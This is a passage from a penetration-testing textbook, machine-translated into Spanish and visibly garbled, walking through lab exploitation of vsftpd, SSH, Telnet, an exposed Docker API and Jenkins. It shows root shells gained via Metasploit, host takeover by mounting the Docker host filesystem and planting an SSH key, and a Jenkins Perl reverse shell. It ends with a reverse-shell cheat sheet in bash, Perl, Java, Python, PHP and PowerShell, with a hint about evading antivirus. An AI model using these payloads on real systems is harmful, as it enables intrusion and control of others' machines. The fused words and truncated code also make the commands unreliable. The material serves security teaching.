vulnerabilidades encontradas en el informe Open VAS anterior (consulte la Figura 7.7). Cada producto de escaneo de vulnerabilidades le mostrará una sección que muestra las referencias de cómo explotar la vulnerabilidad seleccionada. Si se pregunta de dónde obtuve esta información , consulte la Figura 7.7 en la sección de resumen. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.7 Muestra de resultados de vulnerabilidad de OpenVAS Esto significa que podemos usar Metasploit Framework para hacer el trabajo. abra Metasploit y use la funcionalidad de búsqueda para buscarlos 17-010 explotar: msf5>buscarms17-010tipo:explotar MatchingModules ================ #Nombre Rango -------- Divulgación Fecha Comprobar descripción ------------------------------ 0exploit/windows/smb/ms17_010_eternalblue2017-03-14promedioSí MS17-010EternalBlueSMBRemoteWindowsKernelPool Corrupción 1exploit/windows/smb/ms17_010_eternalblue_win82017-03-14promedioNo MS17-010EternalBlueSMBRemoteWindowsKernelPool Corrupción para Win8+ 2exploit/windows/smb/ms17_010_psexecnormalSí MS17-010 2017-03-14 EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindows Ejecución de código 3explotar/windows/smb/smb_doublepulsar_rce Canal de Telegram : @IRFaraExam 2017-04-14 Machine Translated by Google GenialSí SMBDOBLEPULSARRemotoCódigoEjecución Más adelante en este capítulo, obtendremos más detalles sobre cómo aprovechar el protocolo SMB. Si usó el motor de búsqueda de Google, también obtendrá un enlace a la referencia de exploitÿdb (vea la Figura 7.9). Figura 7.8 OpenVASÿ ReportReferences Figura 7.9 GoogleSearchforExploit BuscarSploit Puede usar exploit-db.com usarlaventanaterminalenlugardelaweb Canal de Telegram : @IRFaraExam Machine Translated by Google versiónutilizandolautilidadSearchSploit: $searchsploit[Opciones][Términos de búsqueda] Antes de comenzar a usar la herramienta, deberá actualizar su base de datos para sincronizar con la versión en línea de exploitÿdb : $searchsploit--actualizar Aquí está la búsqueda básica de la famosa vulnerabilidad SMB ms17-010: raíz@kali:~#searchsploitms17-010 -------------------------------------------------- ----------------- -------------------------------------------------- ---- Título del exploit|Ruta -------------------------------------------------- ----------------- -------------------------------------------------- ---- MicrosoftWindows-'EternalRomance'/'EternalSynergy'/'EternalChampion'SMBRemoteCode| windows/remote/43970.rb MicrosoftWindows-SMBRemoteCodeExecutionScanner(MS17-010) (Metasploit)|windows/dos/41891.rb MicrosoftWindows7/2008R2-'EternalBlue'SMBRemoteCodeExecution(MS17-010)| windows/remote/42031.py MicrosoftWindows7/8.1/2008R2/2012R2/2016R2-'EternalBlue'SMBRemoteCodeExecuti| windows/remote/42315.py MicrosoftWindows8/8.1/2012R2(x64)-'EternalBlue'SMBRemoteCodeExecution(MS17-0| windows_x86-64/remote/42030.py MicrosoftWindowsServer2008R2(x64)-'SrvOs2FeaToNt'SMBRemoteCodeExecution(MS1| windows_x86-64/remote/41987.py -------------------------------------------------- ----------------- -------------------------------------------------- ---- Shellcodes:NoResults Papeles:NoResultados SearchSplo es potente porque puede utilizar el filtrado de línea de comandos de Linux (por ejemplo, grep) para hacer el trabajo. Una de las funciones de filtrado integradas que debe tener en cuenta la opción de exclusión . Dado que SearchSploit mostrará una gran cantidad de salida, generalmente excluyo los resultados de DOS. He aquí un ejemplo: root@kali:~#searchsploitms17-010--exclude="/dos/" Además, puede agregar más términos a sus criterios de búsqueda para refinar los resultados. un ejemplo: Canal de Telegram : @IRFaraExam Machine Translated by Google root@kali:~#searchsploitms17-010windowsremote--exclude="/dos/" Una vez que elija un elemento de los resultados, debe copiar el archivo en otro directorio (para que no cambie el contenido del archivo original ) . root@kali:~#searchsploit--mirror43970/root/ Exploit:MicrosoftWindows'EternalRomance'/'EternalSynergy'/'EternalChampion'SMBRemoteCode Ejecución (Metasploit) (MS17-010) URL:https://www.exploit-db.com/exploits/43970 Ruta:/usr/share/ exploitdb/exploits/windows/remote/43970.rb Tipo de archivo: Rubyscript, texto ASCII, con terminadores de línea CRLF Copiado a:/root/43970.rb ServiciosExplotación En el capítulo anterior, enumeramos los servicios más populares que puede encontrar en su carrera como probador de penetración. En esta sección, explotaremos la mayoría de los servicios que intentamos enumerar anteriormente. Explotación del servicio FTP Para conectarnos a un servidor FTP, podemos usar FileZilla como cliente en Kalibox. Para instalarlo, use el siguiente comando: root@kali:~#aptinstallfilezilla-y El siguiente paso es verificar la información que recopilamos durante la fase de enumeración: Enumeración Hallazgos Acceso anónimo permitido usuario:usuariocredencialesvalidas ftp:123456789validcredentials ExploitexistsforvsFTPdversion2.3.4 Inicio de sesión FTP Canal de Telegram : @IRFaraExam Machine Translated by Google Para conectarnos con un inicio de sesión anónimo, usaremos FileZilla e ingresaremos las siguientes credenciales (ver Figura 7.10): Figura 7.10 FileZillaFTPConnect Anfitrión: metasploitable.kcorp.local Nombre de usuario: anonimo Contraseña: cualquier contraseña (puedes escribir lo que quieras allí) El cliente FTP pudo conectarse correctamente al host remoto. Desafortunadamente, el directorio remoto está vacío. Aquí hay algunas ideas comunes de lo que puede lograr en esta etapa: La información confidencial se almacena en archivos en el servidor FTP. Si encontró archivos ejecutables (p. ej., java2.1.exe ), verifique si existe un exploit público, porque existe una alta probabilidad de que el software ya esté instalado en el host remoto. Compruebe si puede cargar archivos. Eso significa que podría invocarlos a través de otros medios para que pueda lograr un shell inverso. A través de una aplicación web A través de un caparazón limitado (para lograr un caparazón raíz) Verificar las otras dos credenciales usando FileZilla también resultó ser cierto. Podemos conectarnos con éxito al servidor FTP. Pero el nombre de usuario user nos da acceso a todos los directorios del usuario ( /home ), como se muestra en la Figura 7.11. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.11 Conexión FileZillaFTP establecida Ejecución remota de código Es hora de comprobar si existe un exploit de shell remoto para esta versión del servidor. Según un escaneo de Nmaps, esta versión de vs FTPd versión 2.3.4 es vulnerable explotar públicamente: |ftpÿvsftpdÿbackdoor:| VULNERABLE: |vsFTPdversión2.3.4puerta trasera Estado: VULNERABLE (explotable) ID:BID:48539CVE:CVE-2011-2523 vsFTPdversion2.3.4backdoor, esto se informó en 2011|||07-04. Fecha de divulgación:2011-07-03 Explotar resultados: |||Comando Shell:id |Resultados:uid=0(raíz)gid=0(raíz) |Referencias: |http://scarybeastsecurity.blogspot.com/2011/07/alert vsftpd-download-backdoored.html |https://github.com/rapid7/metasploit framework/blob/master/ modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 2523 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011- |_ https://www.securityfocus.com/bid/48539 Canal de Telegram : @IRFaraExam Machine Translated by Google Verifique dos veces, generalmente podemos ir al motor de búsqueda de Google y buscar anexploit (ver Figura 7.12). Figura 7.12 GoogleSearch –FTPExploit De acuerdo con los resultados anteriores, el primer enlace apunta al sitio web de Rapid7. En otras palabras, deberíamos poder explotarlo a través de Metasploit: msf5>buscarvsftpdtype:explotar MatchingModules ================ #Nombre Comprobar descripción ----- Divulgación Fecha Rango ------------------- - --------------0exploit/unix/ftp/vsftpd_234_backdoor2011-07-03VSFTPDv2.3.4Ejecución de No comando de puerta trasera excelente Parece que tenemos un buen candidato. Veamos si es explotable. Si eres nuevo a Metasploit y preguntándose qué opciones elegir para cada módulo, entonces el Canal de Telegram : @IRFaraExam Machine Translated by Google la respuesta es simplemente escribir opciones. Pero primero, debe ejecutar el comando use para cargar el módulo de explotación : msf5>useexploit/unix/ftp/vsftpd_234_backdoor msf5exploit(unix/ftp/ vsftpd_234_backdoor)>opciones Opciones de módulo (exploit/unix/ftp/vsftpd_234_backdoor): NombreConfiguración actualObligatorioDescripción --------------------------------------------RHOSTSí Los hosts de destino, el identificador de CIDR de rango o el archivo de hosts con el archivo de sintaxis: <ruta>' RPORT21síEl puerto de destino (TCP) Objetivo de explotación: IdNombre -----0Automático De acuerdo con las opciones anteriores, tenemos dos valores de opción requeridos: RHOSTS(IP de host remoto) RPORT(número de puerto remoto) El valor RPORT ya se ha establecido en el puerto FTP predeterminado 21. A continuación, necesitamos ingresar la dirección IP de Metasploitable y ejecutar el comando de ejecución para ver si podemos explotar el host remoto: msf5exploit(unix/ftp/vsftpd_234_backdoor)>establecerRHOSTS172.16.0.101 RHOSTS=>172.16.0.101 msf5exploit(unix/ftp/vsftpd_234_backdoor)>ejecutar [*]172.16.0.101:21-Banner:220(vsFTPd2.3.4) [*]172.16.0.101:21-USER:331Especifiquelacontraseña. [+] 172.16.0.101: 21: se ha generado el servicio de puerta trasera, manejando ... [+]172.16.0.101:21-UID:uid=0(raíz)gid=0(raíz) [*]Concha encontrada. [*]Commandshellsession3opened(0.0.0.0:0->172.16.0.101:6200) at2020-06-2410:43:31-0400 ls bin cdrom de arranque Canal de Telegram : @IRFaraExam Machine Translated by Google desarrollo, etc. […] ¡Mira esto! Tenemos nuestra primera explotación de caparazón remoto en este libro. A continuación, necesitamos generar el caparazón. PROPINA En el módulo anterior, usé el comando ejecutar para ejecutarlo . También puede usar exploit en su lugar. DesovarunaConcha En el shell remoto anterior, nos faltaba la secuencia de explosión de la ventana terminal. Generar el shell con Python nos permitirá hacer el trabajo. Primero, verifique si Python está instalado en el host usando el comando which . Después de eso, podemos ejecutar el comando de generación de Python : whichPython / usr/bin/python pythonÿc'importpty;pty.spawn("/bin/bash")' root@metasploitable:/# Muy bien, parece que tenemos un rootshell en un solo tiro. Vamos a verificarlo dos veces usando el comando id : root@metasploitable:/#id id uid=0(root)gid=0(root) root@metasploitable:/# De hecho, se trata de un shell raíz, por lo que no es necesario complicarse con las técnicas de escalada de privilegios. W00tW00t (esa es la frase que uso cuando quiero celebrar un shell raíz remoto). Aprovechar el servicio SSH Obtener algunas credenciales para el SSH durante la fase de enumeración es un logro significativo. En el capítulo anterior, obtuvimos la siguiente información: Canal de Telegram : @IRFaraExam Machine Translated by Google Versión del servidor SSH: OpenSSH4.7p1Debian8ubuntu1 (esto es solo informativo) Credenciales válidas: nombre de usuario=usuario;contraseña=usuario Credenciales válidas: nombre de usuario=servicio;contraseña=servicio inicio de sesión SSH Primero, probemos el usuario: las credenciales del usuario para verificar si obtendremos un shell remoto: root@kali:~# sshuser@metasploitable.kcorp.local No se puede establecer la autenticidad del host 'metasploitable.kcorp.local (172.16.0.101)'. RSAkeyfingerprintisSHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk. ¿Está seguro de que desea continuar conectándose (sí/no/[huella digital])? sí Advertencia: Se agregó permanentemente 'metasploitable.kcorp.local, 172.16.0.101' (RSA) a la lista de hosts conocidos. usuario@metasploitable.kcorp.contraseña local:Linuxmetasploitable2.6.24-16servidor#1SMPTjuAbr1013:58:00UTC2008i686 Los programas incluidos con el sistema Ubuntu son software gratuito; los términos de distribución exactos para cada programa descrito en el archivos individuales en/usr/share/doc/*/copyright. Ubuntu viene CON ABSOLUTAMENTE NINGUNA GARANTÍA, en la medida en que lo permita ley aplicable. Para acceder a la documentación oficial de Ubuntu, visite: http://help.ubuntu.com/ Último inicio de sesión: lun jun 816: 50: 212020 de 172.16.0.102 usuario@metasploitable:~$ ¡Funciona! El siguiente desafío es verificar los permisos de este usuario. palabras, ¿eres raíz? usuario@metasploitable:~$id uid=1001(usuario)gid=1001(usuario)grupos=1001(usuario) usuario@metasploitable:~$cat/etc/shadow cat:/etc/shadow:Permiso denegado usuario@metasploitable:~$ Canal de Telegram : @IRFaraExam Machine Translated by Google Según la información anterior, el usuario no tiene autorizaciones para ejecutar con permisos de root. Tal vez el otro usuario, servicio, tenga un permiso de root. Probemos: oot@kali:~# sshservice@metasploitable.kcorp.local service@metasploitable.kcorp.local'spassword:Linuxmetasploitable2.6.24-16server#1SMPThuAbr1013:58:00UTC2008i686 Los programas incluidos con el sistema Ubuntu son software gratuito; los términos de distribución exactos para cada programa se describen en los archivos individuales en /usr/share/doc/*/copyright. Ubuntu viene CON ABSOLUTAMENTE SIN GARANTÍA, en la medida en que lo permita la ley aplicable. Para acceder a la documentación oficial de Ubuntu, visite: http://help.ubuntu.com/ service@metasploitable:~$ id uid=1002(service)gid=1002(service)groups=1002(service) service@metasploitable:~$ cat/etc/shadow cat:/etc/shadow:Permiso denegado servicio@metasploitable:~$ Es lo mismo que la sesión anterior: no pudimos obtener un shell raíz. TelnetServiceExplotación Esto es lo mismo que SSH. El servidor Telnet nos permitirá conectarnos de forma remota a la línea de comandos. En el capítulo anterior, recopilamos la siguiente información: Versión del servidor: 23/tcpopentelnetLinuxtelnetd Credenciales válidas: nombre de usuario=usuario;contraseña=usuario TelnetIniciar sesión Usemos el comando telnet en Kali Linux para conectar y probar las credenciales anteriores encontradas durante la fase de enumeración: root@kali:~# telnetmetasploitable.kcorp.local Trying172.16.0.101… Conectado a metaexplotable.kcorp.local. […] Canal de Telegram : @IRFaraExam Machine Translated by Google metasploitablelogin: usuario Contraseña:Último inicio de sesión:ThuJun2508:21:41EDT2020from172.16.0.102onpts/1 Linuxmetasploitable2.6.24-16server#1SMPThuApr1013:58:00UTC2008i686 Los programas incluidos con el sistema Ubuntu son software gratuito; los términos de distribución exactos para cada programa se describen en los archivos individuales en /usr/share/doc/*/copyright. Ubuntu viene CON ABSOLUTAMENTE SIN GARANTÍA, en la medida en que lo permita la ley aplicable. Para acceder a la documentación oficial de Ubuntu, visite: http://help.ubuntu.com/ user@metasploitable:~$id uid=1001(user)gid=1001(user)groups=1001(user) user@metasploitable:~$ Como puede ver en la salida del terminal anterior, nos conectamos de forma remota al servidor Telnet. Tenemos un shell con privilegios bajos ya que los permisos de este usuario son limitados. SniffingforCleartextInformation Ifyourememberfromthepreviouschapter, welearnedthattheTelnetservice sendsthecommunicationincleartextonthenetwork.Wewillnowseewhatthis lookslikeintheWiresharksniffer.WewillrunWiresharkonourKalihostto interceptalltheoutgoingpackets.Inarealscenario, youwillneedtointercept thecommunicationatthenetworkswitchlevelbysettingaportmirroringport thatcopiesallthetraffictooneswitchport.Thisdependsoneachmanufacturer, butit'sachievablejustbycheckingthemanualoftheswitchvendor.Also, algunos theconnectiontoanoutputconnection hardwarekitsexistandwiththemyoucanplugintothenetworkcabletoredirect (host whichwillbeconnectedtoyourKali). Para ejecutar Wireshark, simplemente ingrese su nombre en la ventana de la terminal, o puede abrirlo desde el menú Kalimenu seleccionando 09–Sniffing&SpoofingÿWireshark. Una vez cargada la ventana, seleccione la interfaz de red que desea escuchar (consulte la Figura 7.13). En este caso, elegiremos eth 0. Haga doble clic en él para comenzar Canal de Telegram : @IRFaraExam Machine Translated by Google olfateando el tráfico entrante y saliente. Intentemos conectarnos de forma remota al servidor Telnet y ejecutar algunos comandos. Después de eso, verificaremos si Wireshark pudo capturar algo de eso (consulte la Figura 7.14). Para comenzar, necesitaremos filtrar, solo para los paquetes Telnet, dentro de Wireshark. Hecho esto, ingresemos la siguiente cadena en la barra de filtro: tcp.puerto==23 Una vez que se haya ejecutado el filtro, haga clic derecho en cualquier paquete y seleccione SeguirÿTransmisión TCP (vea la Figura 7.15). Figura 7.13 Selección de interfaz de Wireshark Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.14 Resultados de captura de Wireshark Figura 7.15 Wireshark: seguimiento de TCPStream En la ventana Flujo de TCP, puede ver las credenciales y los comandos que ejecutamos en la ventana de la terminal (consulte la Figura 7.16). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.16 Wireshark: captura de texto claro A partir de ahora, puede aplicar esta técnica a cualquier protocolo de texto claro, como los siguientes: FTP Telnet SMTP HTTP Canal de Telegram : @IRFaraExam Machine Translated by Google POP3 IMAPv4 NetBIOS SNMP Explotación del servidor de correo electrónico Para que este ataque funcione, necesitaremos una cuenta de usuario comprometida (por ejemplo, usando Hydra). También puede adquirir este hallazgo en un canal diferente; no siempre tiene que ser la técnica de fuerza bruta (por ejemplo, cuenta encontrada en el servidor FTP o credenciales codificadas en el código fuente de la página web, ataque de ingeniería social, etc.). Luego, necesitaremos instalar un cliente de correo en nuestro host Kali Linux. Para este propósito, usemos el programa llamado evolución durante nuestros compromisos (también puede usar Thunderbird). Para instalarlo, utilice el comando aptinstall habitual : root@kali:~#aptinstallevolution-y Para ejecutarlo por primera vez, deberá establecer la configuración entrante/saliente del servidor de correo y toda la información sobre la bandeja de entrada de correo de destino. En esta etapa, debe saber lo siguiente: El nombre de usuario del correo electrónico (en nuestro ejemplo, es gus@kcorp.local ) La contraseña de la cuenta de correo La dirección del servidor de correo (en nuestro ejemplo, es mail.kcorp.local ) En la primera ventana que se muestra en la Figura 7.17, creé la entrada para las configuraciones IMAP/SSL. Si desea utilizar el IMAP no seguro, seleccione el puerto 143 y asegúrese de cambiar el valor del Método de cifrado a Sin cifrado (consulte la Figura 7.17). A continuación, configuraremos las opciones de envío para un puerto SMTP seguro, 465. Una vez más, si desea utilizar el protocolo de texto sin cifrar, establezca el puerto en 25 y asegúrese de cambiar el valor del método de cifrado a Sin cifrado (consulte la Figura 7.18). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.17 Configuración de recepción de correo electrónico Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.18 Configuración de envío de correo electrónico Finalmente, la figura 7.19 muestra un emocionante correo electrónico que Gus recibió en su bandeja de entrada durante el comienzo de su carrera en KCorp . Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.19 Bandeja de entrada de correo electrónico Explotación Docker Para comprender esta sección, necesitará dos requisitos previos. En primer lugar, deberá saber todo lo que tratamos en el capítulo de enumeración anterior. En segundo lugar, deberá estar familiarizado con la tecnología Docker; En este escenario de explotación, hay dos máquinas virtuales host (consulte la figura 7.20): KaliLinux (atacante): 172.16.0.102 UbuntuLinux: 172.16.0.103 En el host Ubuntu de destino, instalaremos un motor Docker (con el puerto TCP 2375 abierto) y también tendremos un contenedor Jenkins ejecutándose. Tenga en cuenta que los contenedores Docker tienen sus propias subredes de red; para este ejemplo, la red de los contenedores Docker es 172.17.0.0/16. Prueba de la conexión de Docker Para interactuar con el motor Docker remoto, primero necesitaremos instalar un cliente Docker en nuestro host Kali: root@kali:~#aptupdate&&aptinstalldocker.io-y root@kali:~#systemctlstartdocker&&systemctlenabledocker Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.20 DockerHostDesign Para probar si podemos conectarnos al Docker remoto, ejecutemos una prueba funciónparalistarloscontenedoresenUbuntuhost: root@kali:~# docker-H172.16.0.103:2375ps-a CONTENEDORIDIMAGENCOMANDOCREADOPORTSNOMBRES ESTADO 7dd7d926605ajenkins"/bin/tini--/usr/l..."2hoursagoUp2hours0.0.0.0:8080->8080/ tcp,0.0.0.0:50000->50000/tcplabjenkins ¡Perfecto, funciona! A continuación, ejecutaremos un nuevo contenedor en el host de Ubuntu para compromiso. Creación de un nuevo contenedor de Kali remoto Enestaetapa,crearemosunnuevoKalicontainerenUbuntu.Recuerdeque estamos usando nuestra máquina virtual Kali para ejecutar estos comandos de Docker de forma remota en el Ubuntuhost de la víctima. DescargarKaliImagen Primero, descargue la imagen de Kali Linux del Docker Hub: root@kali:~# dockerÿH172.16.0.103:2375pullkalilinux/kali Usando la etiqueta predeterminada: más reciente último: Extrayendo de kalilinux/kali ba24b40d7ccc:PullcompleteDigest:sha256:0954a8766c13e16bfc3c4ad1cdd457630bc6f27a2f6a7f456015f61 Canal de Telegram : @IRFaraExam Machine Translated by Google Estado: descargado imagen más nueva para kalilinux/kali: más reciente docker.io/kalilinux/kali:último Comprobar si la imagen se ha descargado Siempre vamos a verificar dos veces si la imagen se descargó correctamente: root@kali:~# dockerÿH172.16.0.103:2375imágenes REPOSITOR CREADO TAMAÑOETIQUETA kalilinux/kali4daysago114MB IMAGEIDlatestbd513360cce5latestcd14cecfdb3a jenkinshace 23 meses696MB EjecutandoelContenedor A continuación, ejecutaremos el contenedor y montaremos el directorio raíz de Ubuntu ( / ) en /mnt en el contenedor Kali (porque queremos comprometer el host de Ubuntu más adelante): root@kali:~# dockerÿH172.16.0.103:2375runÿitdÿÿnamefsocietyÿ v/:/mntbd513360cce5 558c0ae8491290e1dade641cd62f6b7e258a0d6bc1a33cd3bfc0991f8824716a Comprobar si el contenedor se está ejecutando Como otro control, verifiquemos si el contenedor se está ejecutando antes de conectar techo: root@kali:~# dockerÿH172.16.0.103:2375ps CONTENEDORIDIMAGENCOMANDOESTADONOMBRES CREADO PUERTOS 11 558c0ae84912bd513360cce5"bash"segundosagoUp11segundosfsociedad "/ bin / tini - / usr / l…" 2 horas jenkins0.0.0.0:8080->8080/tcp,0.0.0.0:500007dd7d926605aUp2hoursago>50000/tcp labjenkins Introducir una concha en el contenedor de Kali Dado que el contenedor Kali ahora está en funcionamiento, todo lo que necesitamos es ejecutar el exec . comandotogetaremoteshell: root@kali:~# docker-H172.16.0.103:2375exec-it558c0ae84912bash root@558c0ae84912:/#id uid=0(raíz)gid=0(raíz)groups=0(raíz) root@558c0ae84912:/# Canal de Telegram : @IRFaraExam Machine Translated by Google Tenemos un shell remoto raíz en el contenedor Kali. A continuación, comprometamos el host de Ubuntu usando este contenedor. Explotación de DockerHost En esta etapa, tenemos un contenedor Kali Linux ejecutándose en el host de Ubuntu. Pudimos crear este contenedor de forma remota y conectarnos a su shell también. En este paso, aprenderá cómo comprometer el host de Ubuntu a través del contenedor que creamos anteriormente. root@kali:~# nmap172.16.0.103 Iniciando Nmap7.80(https://nmap.org) en 2020-06-2607:15EDT Nmapscanreportfor172.16.0.103 Hostisup(0.00014slatency). No se muestra: 997 puertos cerrados PORTSTATESERVICE 8080/tcpopenhttp-proxy 22/tcpopenssh 50000/tcpopenibm-db2 MACAddress:00:0C:29:96:F8:6C(VMware) Nmapdone: 1 dirección IP (1 host up) escaneada en 0,23 segundos Antes de continuar con el exploit, debe comprender dos puntos clave: El Dockerengine (Daemon) se está ejecutando como raíz en el host de Ubuntu. El contenedor de Kali tiene un volumen adjunto y está asignado a todo el sistema de archivos de Ubuntu. En otras palabras, debemos poder escribir en el host de Ubuntu a través del contenedor de Kali. Generación de claves SSH En la máquina virtual Kali (no en el contenedor), generaremos claves SSH para que podamos conectarnos de forma remota a la máquina virtual Ubuntu. Usemos el comando ssh-keygen para hacer el trabajo (no usaremos una frase de contraseña, así que presionaremos Intro durante la configuración): root@kali:~# sshÿkeygen Generando un par de claves públicas/privadas. Ingrese el archivo en el cual guardar la clave (/root/.ssh/id_rsa): Ingrese la frase de contraseña (vacío para ninguna frase de contraseña): Ingrese la misma frase de contraseña nuevamente: Su identificación ha sido guardada en/root/.ssh/id_rsa Canal de Telegram : @IRFaraExam Machine Translated by Google Su clave pública ha sido guardada en /root/.ssh/id_rsa.pub La huella dactilar clave es: SHA256:w0gYi9/7xBEU46xkO66+X9jCcKUa5NKtcR8WBjccU0kroot@kali La imagen aleatoria de la clave es: +---[RSA3072]----+ |...O=E.| . |++.+.| . ++B || * | = Oh | |.B@S| |.@O+| ** |el| . = || |.+el..| +----[SHA256]-----+ Transferencia de clave En esta etapa, tenemos que transferir la clave pública generada anteriormente, /root/.ssh/id_rsa.pub , edite alcontenedorKalicon.Abramoselarchivoentexto KaliVM (no el contenedor) y copie su contenido. A continuación, volveré a mi conexión de shell remota al contenedor de Kali. Primero, asegurémonos de que tenemos una carpeta ssh dentro del directorio de inicio raíz en el Ubuntuhost. Si no, vamos a crear uno nuevo: raíz@558c0ae84912:~# cd/mnt/raíz root@558c0ae84912:/mnt/root# lsÿla total36 drwx------6rootroot4096Jun1615:48. drwxr-xr-x20rootroot4096Jun1120:23.. -rw------- 1rootroot1608Jun2611:50.bash_history -rw-r--r-- 1rootroot3106Dec52019.bashrc drwx------ 2rootroot4096Jun2611:50.cache drwx------ 3rootroot4096Jun1615:48.config drwxr-xr-x 3rootroot4096Jun1120:36.local -rw-r--r-- 1rootroot161Dec52019.profile drwx------ 3rootroot4096Jun1616:12.vnc root@558c0ae84912:/mnt/root# mkdir.ssh root@558c0ae84912:/mnt/root# cd.ssh Use el comando echo para agregar la clave pública que generamos en Kali VM al archivo de claves_autorizadas . (Si no sabe cuáles son las claves_autorizadas archivo es, consulte la sección SSH del primer capítulo de este libro para comprender cómo SSH funciona entre bastidores.) Canal de Telegram : @IRFaraExam Machine Translated by Google root @ 558c0ae84912: /mnt/root/.ssh#echo "sshrsaAAAAB3NzaC1yc2EAAAADAQABAAABgQDKc2E5yhmGHiz9jE4 + 8oNZ59n26F9T5niTQGWaCI1fhFUFn - <ce: IDenlace =" pp: 189np: 190 "role =" page-break "/> -> UldDMwSIFMdtj4Pcrau + aPls9thC47KprWmkKd47O7yXdiQDUu8OD8cQ7h2HylQEBRlh / root 9xP4JdOy @kali">claves_autorizadas Es hora de la verdad: intente conectarse a la VM de Ubuntu desde nuestro host Kali (no desde el contenedor): root@kali:~# sshroot@172.16.0.103 Bienvenido aUbuntu20.04LTS (GNU/Linux5.4.0-37-genericx86_64) *Documentación:https://help.ubuntu.com https:// * ubuntu.com/advantage landscape.canonical.com Soporte: Gestión:https:// * 34las actualizaciones se pueden instalar inmediatamente. 14 de estas actualizaciones son actualizaciones de seguridad. Para ver estas actualizaciones adicionales, ejecute: aptlist--upgradable Su pila de habilitación de hardware (HWE) es compatible hasta abril de 2025. Último inicio de sesión: VieJun2604:50:392020from172.16.0.102 root@ub01:~# ¡Y tenemos una cáscara de raíz! Explotando Jenkins La explotación de Jenkins es un excelente ejemplo que puede aplicar a otros portales web. Una vez que vea un portal web, debe revisar la siguiente lista de verificación: Omitir la página de inicio de sesión. Entrar por la fuerza bruta Omisión de autenticación de inyección SQL (cubriremos esto más adelante en el libro) Robar las credenciales Inicie sesión y aproveche las debilidades de las funcionalidades del portal. Ejecutar comandos Cargue un shell web (lo cubriremos más adelante en este libro) Si ninguno de estos elementos es factible, tal vez pueda intentar buscar un público Canal de Telegram : @IRFaraExam Machine Translated by Google exploit.Idealmente, el administrador no actualizó el sistema y todavía está usando una versión anterior. Si recuerda de la fase de enumeración, pudimos obtener una cuenta válida (admin:admin) utilizando Hydra. Usémosla para iniciar sesión en el portal (consulte la Figura 7.21). Figura 7.21 Página de inicio de Jenkins Nuestro objetivo en esta etapa es obtener un shell remoto, por lo que necesitaremos ejecutar comandos a través de este portal. gato de red : root@kali:~#nc-nlvp1111 escuchando[cualquiera]1111… Para volver a la página de Jenkins, haga clic en el enlace Crear nuevos trabajos para programar un comando. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.22 Jenkins-Nuevo Proyecto Una vez que esté en la página de configuración del proyecto, desplácese hacia abajo hasta la sección Construir y seleccione el elemento de menú Ejecutar Shell (consulte la Figura 7.23). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.23 Jenkins–Agregar paso de compilación Sabemos por la fase de enumeración que este host está basado en Linux, por lo que usaremos Perl para ejecutar el comando de shell inverso (recuerde que tenemos un oyente en nuestro puerto Kalihoston 1111). No ejecutaremos netcat porque este es un servidor de producción y el administrador de KCorp probablemente no lo instaló; perl-e'useSocket; $i="172.16.0.102"; $p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname(" {open(STDIN,">&S");open(STDOUT,">&S" );op Después de hacer clic en Guardar, la ventana se cerrará. Ahora, todo lo que tenemos que hacer es ejecutar el comando. Para hacer esto, haga clic en Construir ahora en el menú de la izquierda. root@kali:~#nc-nlvp1111 Canal de Telegram : @IRFaraExam Machine Translated by Google escuchando en [cualquier] 1111... conectarse a [172.16.0.102] desde (DESCONOCIDO) [172.16.0.103] 39082 $ id uid = 1000 (jenkins) gid = 1000 (jenkins) grupos = 1000 (jenkins) $ Figura 7.24 Jenkins–ReverseShell ReverseShells En el ejemplo anterior, vio la importancia de ejecutar un shell que sea compatible con el host de la víctima remota. En esta sección, aprenderá acerca de los diferentes tipos de shells que puede ejecutar en la máquina de la víctima. Tenga en cuenta que a veces tendrá que probar diferentes en el mismo host. Intento bash-i> & / dev / tcp / [KaliIP] / [KaliListenerPort] 0> & 1 Perl perl-e'useSocket; $ ip = "[KaliIP]"; $ puerto = [KaliListener Puerto];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockadd {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR ,">&S");exec("/bin/sh -i");};' Canal de Telegram : @IRFaraExam Machine Translated by Google Java runt = Tiempo de ejecución.getRuntime () proc = runt.exec (["/ bin / bash", "- c", "exec5 <> / dev / tcp / [KaliIP] / [KaliListenerport]; cat <& 5 | whilereadline; do\$line2> & 5 > & 5 ; hecho "] asString []) proc.esperar() Pitón python-c'importsocket, subproceso, os; sok = socket.socket (socket.AF_INET, socket.SOCK_STREAM); sok. [KaliIP]",[KaliListenerport]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); subproceso.llamada(["/bin/sh","-i"]);' PHP php-r'fsockopen("[KaliIP]",[KaliListenerport]);exec("/bin/shi<&3>&32>&3");' Potencia Shell Este es complicado; debe tener cuidado porque el sistema operativo Windows ha evolucionado con la detección de malware. Este es un ejemplo de una sola línea Script de PowerShell: $client=Nuevo-ObjectSystem.Net.Sockets.TCPClient("[KaliIP]",[KaliListenerPort]); $stream=$client.GetStream();[byte[]]$bytes=0..65535| %{0 };while(($i=$stream.Read($bytes,0,$bytes.Length))ne0){;$data=(New-ObjectTypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out+ String);$sendback2=$sendback+ "PS"(pwd).Ruta+">"; $sendbyte=([texto.codificación]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendb El revestimiento anterior será detectado principalmente por software antivirus. las herramientas se están volviendo mejores que antes, por lo que debe ser creativo cuando esto surge el desafío Canal de Telegram : @IRFaraExam Machine Translated by Google Uso de Shells con Metasploit En la sección anterior, vio diferentes tipos de proyectiles que puede ejecutar en el host de la víctima. Mantener todos estos comandos no es práctico, por lo que la solución es Metasploit/MSFvenom. Creación de un oyente en 